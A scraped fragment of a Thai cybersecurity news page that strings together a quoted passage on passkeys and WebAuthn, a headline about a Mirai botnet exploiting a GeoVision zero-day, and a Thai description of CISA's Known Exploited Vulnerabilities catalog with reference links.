"I have been playing around with passkeys, or as they are formally known, discoverable credentials. Think of passkeys as a replacement of passwords. They are defined in the Web Authentication (WebAuthn) specification of the W3C (World Wide Web Consortium). This work evolved from several prior efforts including those of the FIDO alliance (FIDO = Fast Identity Online)."
https://www.theregister.com/2024/11/17/passkeys_passwords/
อ้างอิง
Electronic Transactions Development Agency(ETDA)
- Botnet Exploits GeoVision Zero-Day To Install Mirai Malware
-
แคตตาล็อกช่องโหว่ที่ถูกใช้ประโยชน์ที่ทราบโพสต์ใน Cyber Security News
Cybersecurity and Infrastructure Security Agency (CISA) เป็นฐานข้อมูลที่รวบรวมช่องโหว่ด้านความปลอดภัยซึ่งถูกใช้งานในการโจมตีจริง โดยมีเป้าหมายเพื่อช่วยหน่วยงานภาครัฐ องค์กรเอกชน และผู้เชี่ยวชาญด้านความปลอดภัยในการระบุและจัดการช่องโหว่ที่สำคัญ ระบบนี้อัปเดตอย่างต่อเนื่อง พร้อมคำแนะนำด้านการแก้ไขปัญหาเพื่อป้องกันการโจมตีในอนาคต คุณสามารถตรวจสอบรายละเอียดและติดตามคำแนะนำเพิ่มเติมได้ที่ https://www.cisa.gov/known-exploited-vulnerabilities-catalog
อ้างอิง
https://www.cisa.gov/known-exploited-vulnerabilities-catalogสามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
